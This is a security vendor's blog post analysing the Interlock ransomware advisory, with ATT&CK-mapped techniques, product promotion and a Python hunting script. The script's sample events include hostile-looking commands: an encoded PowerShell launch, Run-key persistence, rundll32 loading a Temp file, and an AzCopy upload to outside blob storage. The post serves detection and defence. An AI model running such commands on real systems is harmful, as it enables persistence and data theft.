Huseyin Can YUCEEL | 7 MIN READ

CREATED ON July 23, 2025

Interlock Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA25-203A

On July 22, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Interlock ransomware [1]. Interlock ransomware has been actively targeting critical infrastructure across North America and Europe since late 2024. Their attacks are opportunistic but highly disruptive, impacting virtual machines across Windows and Linux operating systems.

In this blog post, we explain the Tactics, Techniques, and Procedures (TTPs) used by Interlock ransomware and how organizations can defend themselves against Interlock ransomware attacks.


Interlock Ransomware Group

Interlock is a financially motivated ransomware group first observed in September 2024. Interlock operators employ a double extortion strategy encrypting victim data and threatening to leak stolen information if ransom demands are not met.

The group has primarily targeted organizations in North America and Europe, affecting sectors ranging from business services to critical infrastructure. Victims include a mix of large enterprises and smaller organizations, reflecting an opportunistic targeting strategy.

Interlock follows an unusual ransom process. Instead of providing a ransom amount or payment details in the initial note, victims are given a unique ID and directed to a Tor-based website to initiate negotiations. The group has previously followed through on threats to publish stolen data, showing their willingness to escalate pressure on non-compliant victims.

The group's modus operandi involves compromising networks, exfiltrating sensitive data, and then deploying an encryptor tailored for virtualized environments. Interlock operators gain initial access through less common methods, such as drive-by downloads from compromised websites and a deceptive tactic known as ClickFix, which tricks users into executing malicious PowerShell payloads via fake CAPTCHA or alert prompts. After gaining access, they conduct extensive reconnaissance and deploy remote access tools like Cobalt Strike, AnyDesk, and PuTTY. Credential harvesting is facilitated through custom stealers, Lumma Stealer, and Berserk Stealer, while data exfiltration often involves AzCopy to transfer stolen files to Azure storage blobs. The final payload is typically named conhost.exe. It encrypts data using a combination of AES and RSA algorithms, appends .interlock or .1nt3rlock file extensions, and is deleted post-execution to evade detection.

Interlock Ransomware Analysis and MITRE ATT&CK TTPs

Initial Access

T1189 Drive-by Compromise

Interlock actors gain initial access by delivering malicious payloads through drive-by downloads on compromised legitimate websites. Victims are tricked into downloading disguised files, often presented as fake updates for browsers or security tools like FortiClient and Cisco AnyConnect.

T1204.004 User Execution: Malicious Copy and Paste

Using the ClickFix technique, Interlock operators prompt users to run a fake CAPTCHA, which leads them to open the Windows Run dialog and execute a malicious, Base64-encoded PowerShell script. This method depends on manual user interaction to initiate infection.

Execution

T1059.001 Command and Scripting Interpreter: PowerShell

Interlock actors execute PowerShell scripts to drop remote access trojans and perform system reconnaissance. These scripts also create persistence mechanisms, such as registry key modifications.

Persistence

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Interlock operators establish persistence by placing malicious files in the Windows Startup folder or modifying registry run keys. One observed registry entry is disguised as "Chrome Updater" and triggers on user login.

Privilege Escalation

T1078.002 Valid Accounts: Domain Accounts

After gaining access, Interlock actors escalate privileges by compromising domain administrator accounts, possibly through techniques like Kerberoasting.

Defense Evasion

T1036.005 Masquerading: Match Legitimate Name or Location

Malicious components are disguised with names resembling legitimate Windows files, such as conhost.exe and conhost.txt, to blend in with normal system processes and evade detection.

T1070.004 Indicator Removal: File Deletion

Following encryption, Interlock operators use the remove() function in DLL files (e.g., tmp41.wasd) or equivalent Linux commands to delete the ransomware binary and reduce forensic evidence.

T1218.011 System Binary Proxy Execution: Rundll32

Interlock actors use rundll32.exe to execute DLL payloads indirectly, which helps bypass certain security controls and execute post-encryption cleanup.

Discovery

T1033 System Owner/User Discovery

Interlock operators use PowerShell commands like WindowsIdentity.GetCurrent() to identify the current user and determine their access level.

T1082 System Information Discovery

Commands like systeminfo and Get-PSDrive are used to collect details about the operating system, hardware, and logical drives.

T1007 System Service Discovery

Interlock actors run tasklist /svc and Get-Service to enumerate active services, which can indicate the presence of security tools or monitoring systems.

T1016 System Network Configuration Discovery

The arp -a command is used to inspect the ARP cache, helping attackers map internal network IPs and MAC addresses.

Credential Access

T1555.003 Credentials from Web Browsers

Interlock uses information stealers like Lumma and Berserk to collect login credentials stored in web browsers, enabling further access and lateral movement.

T1056.001 Input Capture: Keylogging

Keyloggers such as klg.dll are deployed to record keystrokes and store them in files like conhost.txt, enabling theft of sensitive user input.

T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting

To escalate privileges, Interlock actors may perform Kerberoasting attacks to obtain Kerberos service tickets associated with high-privilege accounts.

Lateral Movement

T1078 Valid Accounts

Harvested credentials are reused to authenticate across systems within the network, enabling stealthy lateral movement.

T1021.001 Remote Services: Remote Desktop Protocol (RDP)

Interlock operators access other systems over RDP using stolen credentials. Tools like AnyDesk and PuTTY are also used to facilitate remote access and movement.

Collection

T1530 Data from Cloud Storage

Before encryption, Interlock actors use tools like Azure Storage Explorer to browse victims' cloud storage environments and identify valuable data.

Exfiltration

T1567.002 Exfiltration to Cloud Storage

Interlock operators exfiltrate data using AzCopy, which uploads files to Azure blob storage controlled by the attackers.

T1048 Exfiltration Over Alternative Protocol

File transfer tools like WinSCP are also used to move exfiltrated data out of the environment using secure copy or FTP protocols.

Command and Control

T1105 Ingress Tool Transfer

Payloads are downloaded to compromised systems using PowerShell and disguised installers. These include credential stealers and keyloggers.

T1219 Remote Access Software

Interlock operators rely on tools like AnyDesk and PuTTY to maintain persistent remote access across victim environments. Cobalt Strike, SystemBC, and custom RATs like Interlock RAT and NodeSnake RAT are used for C2 communication and post-exploitation control.

Impact

T1486 Data Encrypted for Impact

Interlock ransomware encrypts files using AES and RSA encryption algorithms. Encrypted files are given .interlock or .1nt3rlock extensions, and a ransom note (!__README__!.txt) is delivered via group policy.
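The TTP descriptions above (ClickFix encoded PowerShell, the "Chrome Updater" Run key, rundll32 loading tmp41.wasd, and AzCopy uploads) translate directly into hunting logic. The following is an added example written for this post, not code from CISA or Picus: it runs four behavioural rules over constructed process-creation events (the paths, account name and command lines are made up, not advisory indicators).

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample process-creation events (made-up paths, not advisory IoCs).
SAMPLE_EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBi"},
    {"image": r"C:\Windows\System32\reg.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                r'/v "Chrome Updater" /t REG_SZ /d C:\Users\u\AppData\Roaming\upd.exe'},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Users\u\AppData\Local\Temp\conhost.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\tmp41.wasd,run"},
    {"image": r"C:\Tools\azcopy.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "azcopy copy D:\\Finance https://acct.blob.core.windows.net/c --recursive"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmdline": "svchost.exe -k netsvcs"},
]

def _base(path: str) -> str:
    # Lower-cased file name of a Windows path, e.g. "explorer.exe".
    return path.rsplit("\\", 1)[-1].lower()

# (ATT&CK label, predicate) pairs keyed to the Interlock TTPs described above.
RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("T1204.004 ClickFix: encoded PowerShell spawned by explorer.exe",
     lambda e: _base(e["image"]) == "powershell.exe" and _base(e["parent"]) == "explorer.exe"
     and re.search(r"\s-(e|ec|enc|encodedcommand)\s", e["cmdline"], re.I) is not None),
    ("T1547.001 Run-key persistence named 'Chrome Updater'",
     lambda e: _base(e["image"]) == "reg.exe"
     and re.search(r"\\CurrentVersion\\Run\b.*chrome updater", e["cmdline"], re.I) is not None),
    ("T1218.011 rundll32 loading a non-.dll file from a Temp directory",
     lambda e: _base(e["image"]) == "rundll32.exe"
     and re.search(r"\\temp\\[^\s,]+\.(?!dll\b)\w+", e["cmdline"], re.I) is not None),
    ("T1567.002 AzCopy upload to Azure Blob storage",
     lambda e: _base(e["image"]) == "azcopy.exe"
     and ".blob.core.windows.net" in e["cmdline"].lower()),
]

def hunt(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule label, command line) for every event that matches a rule."""
    return [(label, e["cmdline"]) for e in events for label, pred in RULES if pred(e)]

if __name__ == "__main__":
    for label, cmd in hunt(SAMPLE_EVENTS):
        print(f"[{label}] {cmd}")
```

The benign svchost.exe event is included to show the rules do not fire on ordinary service activity; in production the same predicates would be applied to Sysmon Event ID 1 or EDR process telemetry.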

How Does Picus Help Simulate Interlock Ransomware Attacks?

We also strongly suggest simulating Interlock ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as Medusa, Rhysida, and Black Basta, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Interlock ransomware:

Threat ID | Threat Name                          | Attack Module
21524     | Interlock Ransomware Download Threat | Network Infiltration
96088     | Interlock Ransomware Email Threat    | Email Infiltration (Phishing)

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Interlock ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs has validated the following signatures for Interlock ransomware:

Security Control | Signature ID | Signature Name
Check Point NGFW | 08B3EB31F    | Ransomware.Win32.Interlock.TC.1df5VOTF
Check Point NGFW | 09ABBFEA6    | Ransomware.Linux.KeyLogger.TC.bcaeCRBq
Check Point NGFW | 0C204264B    | Generic.Win32.Generic.TC.d553GGkR
Check Point NGFW | 0ED3EEC09    | Ransomware.Linux.KeyLogger.TC.18cbZXxn
Check Point NGFW | 0BDCA5EC7    | Generic.Win32.Generic.TC.a91eIWYD
Check Point NGFW | 09F809A53    | Generic.Win32.Generic.TC.6ff7afMP
Cisco FirePower  |              | Auto.E86BB8.272353.in02
Cisco FirePower  |              | Auto.A26F0A.272351.in02
Cisco FirePower  |              | W32.GenericKD:MalwareXgenTrj.27k2.1201
Cisco FirePower  |              | Auto.4A9759.281561.in02
Cisco FirePower  |              | W32.B85586F954-95.SBX.TG
Cisco FirePower  |              | Auto.33DC99.281562.in02
Cisco FirePower  |              | W32.Attribute.28fz.1201
Forcepoint NGFW  |              | File_Malware-Blocked
Fortigate AV     | 10193449     | Linux/Filecoder_InterLock.A!tr
Fortigate AV     | 10193896     | W32/Kryptik.HXUY!tr.ransom
Fortigate AV     | 10188004     | W64/Filecoder_Rhysida.C!tr
Fortigate AV     | 10190660     | W32/Kryptik.HXUY!tr
Palo Alto        | 676221598    | trojan/Linux.interlock.a
Palo Alto        | 660282886    | trojan/Win32.rhysida.r
Palo Alto        | 681771457    | trojan/Win32.interlock.b
Palo Alto        | 701844994    | Program/Win32.wacapew.fijl
Palo Alto        | 715013317    | trojan/Win32.interlock.e
Palo Alto        | 706345643    | Trojan/Win32.wacatac.weql
Palo Alto        | 701849705    | Ransom/Win32.rapidstop.d
Trellix          | 0x4840c900   | MALWARE: Malicious File Detected by GTI

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "#StopRansomware: Interlock Ransomware," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a
